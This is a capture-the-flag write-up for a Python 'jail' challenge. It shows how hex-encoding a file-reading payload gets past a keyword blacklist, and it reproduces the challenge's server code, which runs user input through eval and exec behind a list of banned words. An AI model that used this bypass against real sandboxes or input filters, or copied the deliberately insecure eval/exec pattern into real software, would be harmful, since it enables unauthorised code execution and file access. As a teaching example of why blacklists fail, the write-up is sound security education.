Tags: misc python jail

Rating:

In this misc challenge with the description:

When has a blacklist of insecure keywords EVER failed?

nc chall2.2019.redpwn.net 6006

we are also given a blacklist of words (look at blacklist.txt) that we can't use in this python shell. Let's try to open a file in the classic way:


wow! there's a file called flag.txt right here!
That's not allowed here
>>>


The blacklist is actually working, let's try to put random things to raise errors:


wow! there's a file called flag.txt right here!
>>> asd
Traceback (most recent call last):
File "jail1.py", line 49, in <module>
data = eval(data)
File "<string>", line 1, in <module>
NameError: name 'asd' is not defined


Here we can see that there is an eval statement, let's assume that the blacklist control is naive as:

python
for x in blacklist:
#error handling


we can bypass the check passing the file reading statement encoded in some way, let's try with hexadecimal

python


in hex become

python
"7072696e74286f70656e2827666c61672e74787427292e72656164282929"


so we should send

python
"7072696e74286f70656e2827666c61672e74787427292e72656164282929".decode('hex')



wow! there's a file called flag.txt right here!
>>> "7072696e74286f70656e2827666c61672e74787427292e72656164282929".decode('hex')
flag{bl4ckl1sts_w0rk_gre3344T!}


P.S: Let's have fun dumping the software used for this challenge using:


"7072696e74286f70656e28276a61696c312e707927292e72656164282929"
"7072696e74286f70656e28276a61696c312e707927292e72656164282929".decode('hex')


The code used for this challenge is:
python
#!/usr/bin/env python

from __future__ import print_function

print("wow! there's a file called flag.txt right here!")
banned = [
"import",
"ast",
"eval",
"=",
"pickle",
"os",
"subprocess",
"i love blacklisting words!",
"input",
"sys",
"windows users",
"print",
"execfile",
"hungrybox",
"builtins",
"open",
"most of these are in here just to confuse you",
"_",
"dict",
"[",
">",
"<",
":",
";",
"]",
"exec",
"hah almost forgot that one",
"for",
"@"
"dir",
"yah have fun",
"file"
]

while 1:
print(">>>", end=' ')
data = raw_input()
for no in banned:
if str(no).lower() in str(data).lower():
print("That's not allowed here")
break
else: # this means nobreak
data = eval(data)
if("code" not in str(data)):
data = str(data)
exec(data)